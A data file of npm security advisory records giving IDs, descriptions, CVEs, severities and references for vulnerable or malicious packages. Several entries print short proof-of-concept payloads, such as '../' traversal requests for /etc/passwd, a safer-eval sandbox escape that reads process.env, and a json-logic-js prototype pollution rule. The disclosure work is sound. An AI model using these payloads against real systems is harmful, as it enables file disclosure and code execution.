{'https://www.npmjs.com/advisories/152', 'https://nvd.nist.gov/vuln/detail/CVE-2013-4116', 'http://www.securityfocus.com/bid/61083', 'https://github.com/npm/npm/commit/f4d31693', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/87141', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=715325', 'http://www.openwall.com/lists/oss-security/2013/07/10/17', 'https://github.com/npm/npm/issues/3635', 'https://bugzilla.redhat.com/show_bug.cgi?id=983917', 'https://github.com/npm/npm', 'http://www.openwall.com/lists/oss-security/2013/07/11/9'}
null
npm
GHSA-5pg7-v24c-9rp9
Prototype pollution in controlled-merge
Prototype pollution vulnerability in 'controlled-merge' versions 1.0.0 through 1.2.0 allows attacker to cause a denial of service and may lead to remote code execution.
{'CVE-2020-28268'}
2021-04-19T22:11:46Z
2021-05-18T01:53:46Z
HIGH
null
{'CWE-1321'}
{'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4', 'https://www.npmjs.com/package/controlled-merge', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28268', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28268'}
null
npm
GHSA-hq8g-qq57-5275
SQL Injection in untitled-model
All versions of `untitled-model` re vulnerable to SQL Injection. Query parameters are not properly sanitized allowing attackers to inject SQL statements and execute arbitrary SQL queries. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-08-31T18:43:13Z
2020-09-11T21:24:33Z
HIGH
null
{'CWE-89'}
{'https://hackerone.com/reports/507222', 'https://www.npmjs.com/advisories/989'}
null
npm
GHSA-mq7g-6rv4-pj95
Downloads Resources over HTTP in embedza
Affected versions of `embedza` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `embedza`. ## Recommendation Update to version 1.2.4 or later.
{'CVE-2016-10569'}
2021-01-08T18:26:10Z
2019-02-18T23:35:23Z
HIGH
null
{'CWE-311'}
{'https://github.com/advisories/GHSA-mq7g-6rv4-pj95', 'https://nodesecurity.io/advisories/187', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10569', 'https://www.npmjs.com/advisories/187'}
null
npm
GHSA-crr2-ph72-c52g
Malicious Package in my-very-own-package
All versions of `my-very-own-package` contain malicious code. The package sends the output of `process.versions`, `process.arch` and `process.platform` to a remote server in a postinstall script. ## Recommendation Remove the package from your environment. There are no further signs of compromise.
null
2021-09-30T17:44:05Z
2020-09-03T17:27:22Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1043'}
null
npm
GHSA-277p-xwpp-3jf7
Malicious Package in rrgod
All versions of `rrgod` are considered malicious. The package is malware designed to run arbitrary scripts. When installed, the package downloads an arbitrary file and executes its contents as a pre, post and install scripts. ## Recommendation This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
null
2021-10-01T13:42:09Z
2020-09-02T15:49:22Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/764'}
null
npm
GHSA-74hh-4rcv-pp27
Malicious Package in bitconijs-lib
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:43:53Z
2020-09-04T16:44:19Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1370'}
null
npm
GHSA-q52j-4q2q-hcj6
Authentication Bypass in console-io
Affected versions of the `console-io` package do not configure the underlying websocket library to require authentication, resulting in an authentication bypass vulnerability. As `console-io` allows terminal access on the server via a web page, an authentication bypass is essentially remote code execution. ## Recommendation Update to version 2.3.0 or later.
{'CVE-2016-10532'}
2021-09-16T19:31:28Z
2019-02-18T23:39:39Z
CRITICAL
null
{'CWE-287'}
{'https://www.npmjs.com/advisories/90', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10532', 'https://github.com/advisories/GHSA-q52j-4q2q-hcj6', 'https://nodesecurity.io/advisories/90'}
null
npm
GHSA-52qp-gwwh-qrg4
Missing Handler in @scandipwa/magento-scripts
### Impact After changing the function from synchronous to asynchronous there wasn't implemented handler in the [start](https://docs.create-magento-app.com/getting-started/available-commands/start), [stop](https://docs.create-magento-app.com/getting-started/available-commands/stop), [exec](https://docs.create-magento-app.com/getting-started/available-commands/exec) and [logs](https://docs.create-magento-app.com/getting-started/available-commands/logs) commands, effectively making them unusable. ### Patches [Version 1.5.3](https://github.com/scandipwa/create-magento-app/releases/tag/%40scandipwa%2Fmagento-scripts%401.5.3) contains patches for the problems described above. ### Workarounds Upgrade to patched or latest (recommended) version `npm i @scandipwa/magento-scripts@1.5.3` or `npm i @scandipwa/magento-scripts@latest`. ### References New releases always available here: https://github.com/scandipwa/create-magento-app/releases ### For more information If you have any questions or comments about this advisory: * Open an issue in [create-magento-app](https://github.com/scandipwa/create-magento-app/issues)
{'CVE-2021-32684'}
2021-06-16T20:15:07Z
2021-06-21T17:10:02Z
MODERATE
null
{'CWE-670'}
{'https://github.com/scandipwa/create-magento-app/security/advisories/GHSA-52qp-gwwh-qrg4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32684', 'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}
null
npm
GHSA-j6w4-pg6p-5mrv
Directory Traversal in tmock
`tmock` is a static file server. `tmock` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url. Example Request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host: localhost ``` and server Response: ``` HTTP/1.1 200 OK Date: Thu, 04 May 2017 23:59:18 GMT Connection: keep-alive Transfer-Encoding: chunked {contents of /etc/passwd} ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16106'}
2020-08-31T18:20:53Z
2018-07-23T23:51:04Z
HIGH
null
{'CWE-22'}
{'https://github.com/advisories/GHSA-j6w4-pg6p-5mrv', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/tmock', 'https://nodesecurity.io/advisories/375', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16106', 'https://www.npmjs.com/advisories/375'}
null
npm
GHSA-6584-gfwm-3vc3
Malicious Package in budfer-xor
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-29T20:54:03Z
2020-09-03T21:43:01Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1233'}
null
npm
GHSA-g4xp-36c3-f7mr
Hidden Directories Always Served in inert
Versions 1.1.1 and earlier of `inert` are vulnerable to an information leakage vulnerability which causes files in hidden directories to be served, even when showHidden is false. The inert directory handler always allows files in hidden directories to be served, even when `showHidden` is false. ## Recommendation Update to version >= 1.1.1.
{'CVE-2014-10068'}
2020-08-31T18:07:50Z
2020-08-31T22:47:41Z
MODERATE
null
{'CWE-22'}
{'https://nodesecurity.io/advisories/14', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10068', 'https://github.com/hapijs/inert/pull/15', 'https://github.com/hapijs/inert/commit/e8f99f94da4cb08e8032eda984761c3f111e3e82', 'https://www.npmjs.com/advisories/14'}
null
npm
GHSA-mpjm-v997-c4h4
Sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API
### Impact This vulnerability allows a sandboxed renderer to request a "thumbnail" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases. All current stable versions of Electron are affected. ### Patches This was fixed with #30728, and the following Electron versions contain the fix: - 15.0.0-alpha.10 - 14.0.0 - 13.3.0 - 12.1.0 - 11.5.0 ### Workarounds If your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit. Further, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the 'ready' event: ```js delete require('electron').nativeImage.createThumbnailFromPath ``` ### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).
{'CVE-2021-39184'}
2021-10-12T18:54:44Z
2021-10-12T21:59:13Z
MODERATE
null
{'CWE-668'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39184', 'https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4', 'https://github.com/electron/electron', 'https://github.com/electron/electron/pull/30728', 'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}
null
npm
GHSA-c6pw-q7f2-97hv
Privilege Escalation in cordova-plugin-inappbrowser
Versions of `cordova-plugin-inappbrowser` prior to 3.1.0 are vulnerable to Privilege Escalation. A website running in the InAppBrowser webview on Android could execute arbitrary JavaScript in the main application's webview using a specially crafted gap-iab: URI. This affects Cordova Android applications using the package. ## Recommendation Upgrade to version 3.1.0 or later.
{'CVE-2019-0219'}
2021-06-15T17:25:24Z
2020-09-04T17:57:43Z
CRITICAL
null
{'CWE-79'}
{'http://www.openwall.com/lists/oss-security/2019/11/28/1', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread/4vtg0trdrh5203dktt4f3vkd5z2d5ndj', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.npmjs.com/advisories/1467', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0219', 'https://lists.apache.org/thread.html/197482d5ab80c0bff4a5ec16e1b0466df38389d9a4b5331d777f14fc%40%3Cdev.cordova.apache.org%3E'}
null
npm
GHSA-pc5p-h8pf-mvwp
Machine-In-The-Middle in https-proxy-agent
Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials. ## Recommendation Upgrade to version 3.0.0 or 2.2.3.
null
2021-08-23T15:27:24Z
2020-04-16T03:14:56Z
MODERATE
null
{'CWE-300'}
{'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b', 'https://hackerone.com/reports/541502', 'https://www.npmjs.com/advisories/1184', 'https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131'}
null
npm
GHSA-7xrj-f5rp-j55h
Uncontrolled Resource Consumption in transpile
All versions of package transpile are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.
{'CVE-2021-23429'}
2021-08-25T19:32:59Z
2021-09-02T17:10:42Z
MODERATE
null
{'CWE-400', 'CWE-755'}
{'https://snyk.io/vuln/SNYK-JS-TRANSPILE-1290774', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23429', 'https://github.com/stealjs/transpile', 'https://github.com/stealjs/transpile/blob/56aaeb26f69496e45a60c03dc92653d53021d4ac/main.js%23L53'}
null
npm
GHSA-4c7m-wxvm-r7gc
Improper parsing of octal bytes in netmask
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. :exclamation: NOTE: The fix for this issue was incomplete. A subsequent fix was made in version `2.0.1` which was assigned [CVE-2021-29418 / GHSA-pch5-whg9-qr2r](https://github.com/advisories/GHSA-pch5-whg9-qr2r). For complete protection from this vulnerability an upgrade to version 2.0.1 or later is recommended.
{'CVE-2021-28918'}
2022-04-01T20:21:55Z
2021-04-14T15:03:16Z
CRITICAL
null
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28918', 'https://github.com/rs/node-netmask/', 'https://github.com/advisories/GHSA-pch5-whg9-qr2r', 'https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/', 'https://security.netapp.com/advisory/ntap-20210528-0010/', 'https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md', 'https://github.com/rs/node-netmask/blob/98294cb20695f2c6c36219a4fbcd4744fb8d0682/CHANGELOG.md#v110-mar-18-2021', 'https://www.npmjs.com/package/netmask', 'https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/'}
null
npm
GHSA-779f-wgxg-qr8f
Prototype Pollution in lodash.mergewith
Versions of `lodash.mergewith` before 4.6.2 are vulnerable to prototype pollution. The function `mergeWith` may allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects. ## Recommendation Update to version 4.6.2 or later.
null
2020-08-31T18:46:16Z
2020-09-03T18:10:22Z
HIGH
null
{'CWE-1321'}
{'https://www.npmjs.com/advisories/1071'}
null
npm
GHSA-28hp-fgcr-2r4h
Cross-Site Scripting via JSONP
JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors.
null
2021-02-24T18:32:36Z
2019-06-27T17:25:42Z
MODERATE
null
{'CWE-79'}
{'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4', 'https://www.npmjs.com/advisories/1630'}
null
npm
GHSA-3r8w-mphv-2f3f
Prototype Pollution
All versions of package lutils are vulnerable to Prototype Pollution via the main (merge) function.
{'CVE-2021-23396'}
2021-06-18T18:35:57Z
2021-06-21T17:12:25Z
MODERATE
null
{'CWE-1321'}
{'https://snyk.io/vuln/SNYK-JS-LUTILS-1311023', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23396'}
null
npm
GHSA-mgr2-3mpv-43gc
Downloads Resources over HTTP in openframe-image
Affected versions of `openframe-image` insecurely downloads resources over HTTP. In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10616'}
2021-09-16T20:55:30Z
2019-02-18T23:47:37Z
HIGH
null
{'CWE-269', 'CWE-311'}
{'https://nodesecurity.io/advisories/218', 'https://github.com/OpenframeProject/Openframe-Image', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10616', 'https://www.npmjs.com/advisories/218', 'https://github.com/advisories/GHSA-mgr2-3mpv-43gc'}
null
npm
GHSA-r659-8xfp-j327
Prototype Pollution in objection.js
objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.
{'CVE-2021-3766'}
2021-10-08T20:12:33Z
2021-09-07T23:09:43Z
CRITICAL
null
{'CWE-915', 'CWE-1321'}
{'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766', 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://github.com/vincit/objection.js'}
null
npm
GHSA-773h-w45w-f2f9
Denial of service vulnerability exists in libxmljs
libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.
{'CVE-2022-21144'}
2022-05-04T14:48:04Z
2022-05-03T00:00:46Z
HIGH
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21144', 'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d', 'https://github.com/libxmljs/libxmljs/pull/594', 'https://github.com/libxmljs/libxmljs', 'https://snyk.io/vuln/SNYK-JS-LIBXMLJS-2348756'}
null
npm
GHSA-6gww-qpm6-mc2g
Server-Side Request Forgery in ssrf-agent
The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.
{'CVE-2021-23718'}
2021-11-29T15:08:38Z
2021-12-02T17:51:51Z
MODERATE
null
{'CWE-918'}
{'https://security.netapp.com/advisory/ntap-20211203-0005/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23718', 'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346', 'https://github.com/welefen/ssrf-agent/blob/cec2b85fe8886ad6926a247a3e059d8369ec022b/index.js%23L13', 'https://github.com/welefen/ssrf-agent', 'https://snyk.io/vuln/SNYK-JS-SSRFAGENT-1584362'}
null
npm
GHSA-gfj6-p24g-6hpm
Malicious Package in jc-sha3
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-30T16:35:07Z
2020-09-03T22:55:06Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1277'}
null
npm
GHSA-h9v8-rm3m-5h5f
OS Command Injection in git-add-remote
git-add-remote through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the name argument.
{'CVE-2020-7630'}
2021-07-28T22:39:13Z
2022-02-10T23:47:47Z
CRITICAL
null
{'CWE-78'}
{'https://snyk.io/vuln/SNYK-JS-GITADDREMOTE-564269', 'https://github.com/jonschlinkert/git-add-remote/blob/master/index.js#L21,', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7630'}
null
npm
GHSA-96qc-ghj4-rq27
Directory Traversal in yttivy
Affected versions of `yttivy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16219'}
2020-08-31T18:23:16Z
2020-09-01T18:24:56Z
HIGH
null
{'CWE-22'}
{'https://nodesecurity.io/advisories/441', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16219', 'https://www.npmjs.com/advisories/441', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yttivy'}
null
npm
GHSA-wj36-v8j4-pc7c
Low severity vulnerability that affects express-cart
A deficiency in the access control in module express-cart <=1.1.5 allows unprivileged users to add new users to the application as administrators.
{'CVE-2018-16483'}
2021-09-21T21:12:02Z
2019-02-07T18:16:03Z
HIGH
null
{'CWE-290'}
{'https://github.com/advisories/GHSA-wj36-v8j4-pc7c', 'https://hackerone.com/reports/343626', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16483'}
null
npm
GHSA-vqmr-957g-r7w3
High severity vulnerability that affects rendertron
Installed packages are exposed by node_modules in Rendertron 1.0.0, allowing remote attackers to read absolute paths on the server by examining the "_where" attribute of package.json files.
{'CVE-2017-18355'}
2021-09-20T22:15:14Z
2019-02-12T15:36:39Z
HIGH
null
{'CWE-200'}
{'https://github.com/GoogleChrome/rendertron', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18355', 'https://github.com/GoogleChrome/rendertron/pull/88', 'https://bugs.chromium.org/p/chromium/issues/detail?id=759111', 'https://github.com/advisories/GHSA-vqmr-957g-r7w3', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'}
null
npm
GHSA-vm6v-w6q2-mrrq
Malicious Package in bb-builder
All versions of `bb-builder` contained malicious code. The package ran an executable targeting Windows and uploaded information to a remote server. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T20:09:24Z
2020-09-03T19:20:05Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1119'}
null
npm
GHSA-m362-87jc-f39v
Directory Traversal in uv-tj-demo
Affected versions of `uv-tj-demo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16200'}
2020-08-31T18:22:45Z
2020-09-01T18:16:24Z
HIGH
null
{'CWE-22'}
{'https://nodesecurity.io/advisories/428', 'https://www.npmjs.com/advisories/428', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/uv-tj-demo', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16200'}
null
npm
GHSA-82gw-pqf7-q3j2
High severity vulnerability that affects pym.js
NPR Visuals Team Pym.js version versions 0.4.2 up to 1.3.1 contains a Cross Site Request Forgery (CSRF) vulnerability in Pym.js _onNavigateToMessage function. https://github.com/nprapps/pym.js/blob/master/src/pym.js#L573 that can result in Arbitrary javascript code execution. This attack appear to be exploitable via Attacker gains full javascript access to pages with Pym.js embeds when user visits an attacker crafted page.. This vulnerability appears to have been fixed in versions 1.3.2 and later.
{'CVE-2018-1000086'}
2021-09-03T21:50:02Z
2018-03-13T20:38:51Z
HIGH
null
{'CWE-352'}
{'https://github.com/nprapps/pym.js', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000086', 'http://blog.apps.npr.org/2018/02/15/pym-security-vulnerability.html', 'https://github.com/advisories/GHSA-82gw-pqf7-q3j2', 'https://github.com/nprapps/pym.js/issues/170'}
null
npm
GHSA-c5hm-xc74-pqrg
OS Command Injection in jscover
jscover through 1.0.0 is vulnerable to Command Injection. It allows execution of arbitrary command via the source argument.
{'CVE-2020-7623'}
2021-07-28T21:54:19Z
2022-02-10T23:37:22Z
CRITICAL
null
{'CWE-78'}
{'https://github.com/node-modules/jscover/blob/master/lib/jscover.js#L59,', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7623', 'https://snyk.io/vuln/SNYK-JS-JSCOVER-564250'}
null
npm
GHSA-hjgp-8ffr-hwwr
Downloads Resources over HTTP in closurecompiler
Affected versions of `closurecompiler` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `closurecompiler`. ## Recommendation Update to version 1.6.1 or later.
{'CVE-2016-10582'}
2021-01-08T18:40:45Z
2019-02-18T23:51:19Z
HIGH
null
{'CWE-311'}
{'https://nodesecurity.io/advisories/169', 'https://www.npmjs.com/advisories/169', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10582', 'https://github.com/advisories/GHSA-hjgp-8ffr-hwwr', 'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'}
null
npm
GHSA-762c-v946-pf25
Malicious Package in bpi39
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:44:46Z
2020-09-04T16:47:33Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1373'}
null
npm
GHSA-r3x4-wr4h-pw33
Sandbox Breakout / Arbitrary Code Execution in safer-eval
Versions of `safer-eval` prior to 1.3.4 are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code. For example, evaluating he string `console.constructor.constructor('return process')().env` prints `process.env` to the console. ## Recommendation Upgrade to version 1.3.4 or later.
{'CVE-2019-10759'}
2021-07-27T22:20:06Z
2019-10-21T21:58:34Z
CRITICAL
null
{'CWE-94'}
{'https://www.npmjs.com/advisories/1021', 'https://snyk.io/vuln/SNYK-JS-SAFEREVAL-173772', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10759'}
null
npm
GHSA-455m-q3h9-34pf
Downloads Resources over HTTP in windows-seleniumjar-mirror
Affected versions of `windows-seleniumjar-mirror` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-seleniumjar-mirror`. ## Recommendation No patch is currently available for this vulnerability. Currently, the best mitigation is to download the selenium jar file manually from [seleniumHQ](https://www.seleniumhq.org/download/). Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10670'}
2021-01-08T21:17:34Z
2019-02-18T23:44:29Z
HIGH
null
{'CWE-311'}
{'https://nodesecurity.io/advisories/281', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10670', 'https://github.com/advisories/GHSA-455m-q3h9-34pf', 'https://www.npmjs.com/advisories/281'}
null
npm
GHSA-mc7w-4cjf-c973
OS Command Injection in node-opencv
utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.
{'CVE-2019-10061'}
2021-10-07T19:30:03Z
2021-10-12T22:06:57Z
CRITICAL
null
{'CWE-78'}
{'https://github.com/peterbraden/node-opencv/', 'https://www.npmjs.com/advisories/789', 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061', 'https://www.npmjs.com/package/opencv'}
null
npm
GHSA-fw4p-36j9-rrj3
Denial of Service in sequelize
Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process. The following proof-of-concept crashes the Node process: ``` const Sequelize = require('sequelize'); const sequelize = new Sequelize({ dialect: 'sqlite', storage: 'database.sqlite' }); const TypeError = sequelize.define('TypeError', { name: Sequelize.STRING, }); TypeError.sync({force: true}).then(() => { return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"}); }); ``` ## Recommendation Upgrade to version 4.44.4 or later.
null
2020-08-31T18:48:48Z
2020-09-03T20:25:33Z
MODERATE
null
null
{'https://www.npmjs.com/advisories/1142', 'https://github.com/sequelize/sequelize/pull/11877'}
null
npm
GHSA-jppx-hw2f-8gx4
Downloads Resources over HTTP in chromedriver126
Affected versions of `chromedriver126` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `chromedriver126`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10609'}
2021-01-08T18:32:35Z
2019-02-18T23:33:30Z
HIGH
null
{'CWE-311'}
{'https://nodesecurity.io/advisories/203', 'https://github.com/advisories/GHSA-jppx-hw2f-8gx4', 'https://www.npmjs.com/advisories/203', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10609'}
null
npm
GHSA-m9hw-7xfv-wqg7
Prototype Pollution in json-logic-js
Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution. The following rule creates a popup when run from a browser: ``` { "method": [ { "method": [ { "var": "__proto__.constructor.is.__proto__" }, "constructor", [ "var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)" ] ] }, "call" ] } ```
null
2020-11-12T19:35:53Z
2020-11-12T19:36:14Z
HIGH
null
{'CWE-471'}
{'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b', 'https://www.npmjs.com/package/json-logic-js', 'https://www.npmjs.com/advisories/1542'}
null
npm
GHSA-9p47-w5xp-f4xr
Downloads Resources over HTTP in windows-build-tools
Affected versions of `windows-build-tools` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-build-tools`. ## Recommendation Update to version 1.0.0 or later.
{'CVE-2017-16003'}
2021-01-08T19:03:25Z
2018-11-09T17:48:37Z
HIGH
null
{'CWE-311'}
